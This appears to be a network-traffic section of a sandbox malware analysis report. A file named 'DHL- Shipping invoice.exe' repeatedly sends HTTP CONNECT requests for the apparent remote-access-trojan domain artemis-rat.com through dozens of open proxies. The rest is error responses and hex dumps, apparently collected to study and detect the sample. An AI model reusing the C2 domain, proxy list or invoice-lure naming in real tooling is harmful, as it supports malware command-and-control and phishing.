                            Mar 12, 2024 08:37:00.473632097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.816482067 CET223INHTTP/1.1 400 Bad Request
                            Date: Tue, 12 Mar 2024 07:34:27 GMT
                            Content-Type: text/plain; charset=utf-8
                            Connection: close
                            Content-Length: 12
                            X-Kong-Response-Latency: 2.8610229492188e-05
                            Server: kong/2.8.1
                            Data Raw: 42 61 64 20 72 65 71 75 65 73 74 0a
                            Data Ascii: Bad request


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            387192.168.2.451353213.136.78.200392726484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.473767996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.937244892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            388192.168.2.45123877.77.64.11631286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.474309921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            389192.168.2.45113945.133.168.8280806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.474364042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            390192.168.2.450285103.66.233.17741456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.475238085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            391192.168.2.45043751.75.126.150196936484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.475469112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            392192.168.2.451174111.90.150.10910806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.475802898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            393192.168.2.451176103.163.51.254806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.476186991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.794734001 CET343INHTTP/1.1 400 Bad Request
                            Server: nginx/1.14.0 (Ubuntu)
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 182
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            394192.168.2.45136779.110.196.14580816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.476288080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            395192.168.2.450241104.248.158.78124036484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.476388931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.562460899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.563481092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.562753916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:24.571537018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:36.749942064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:48.765388966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:12.859134912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:00.955007076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            396192.168.2.4513755.75.200.38806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.476476908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            397192.168.2.451384144.76.96.18055666484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.476532936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.651246071 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            398192.168.2.45138798.178.72.21109196484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.476536036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            399192.168.2.450505209.126.104.38150976484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.476629019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.640425920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            400192.168.2.451382173.249.29.24391236484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.477046013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.655308962 CET536INHTTP/1.1 503 Service Unavailable
                            Server: squid/3.5.27
                            Mime-Version: 1.0
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html;charset=utf-8
                            Content-Length: 3833
                            X-Squid-Error: ERR_DNS_FAIL 0
                            Vary: Accept-Language
                            Content-Language: en
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45
                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>E


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            401192.168.2.45138934.176.153.984436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.477375031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            402192.168.2.45094664.227.108.25319086484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.477428913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            403192.168.2.45144231.7.65.184436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.477632999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            404192.168.2.451242221.6.139.19090026484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.478205919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.835241079 CET311INHTTP/1.1 400 Bad Request
                            Server: nginx
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 166
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            405192.168.2.45138872.210.221.22341456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.478208065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            406192.168.2.45151631.7.65.184436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.479804039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            407192.168.2.45151834.176.153.984436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.480197906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            408192.168.2.450510161.97.173.42226536484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.481823921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.640655994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.750361919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.843903065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:24.953138113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:36.971625090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:49.140412092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:13.140428066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:01.264116049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            409192.168.2.45151931.7.65.184436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.482089043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            410192.168.2.45152031.7.65.184436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.483799934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            411192.168.2.451335171.250.221.19110806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.529103994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            412192.168.2.45052398.181.137.8041456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.529119968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            413192.168.2.450608146.19.106.193123346484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.529565096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            414192.168.2.45041236.41.72.4377776484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.529902935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
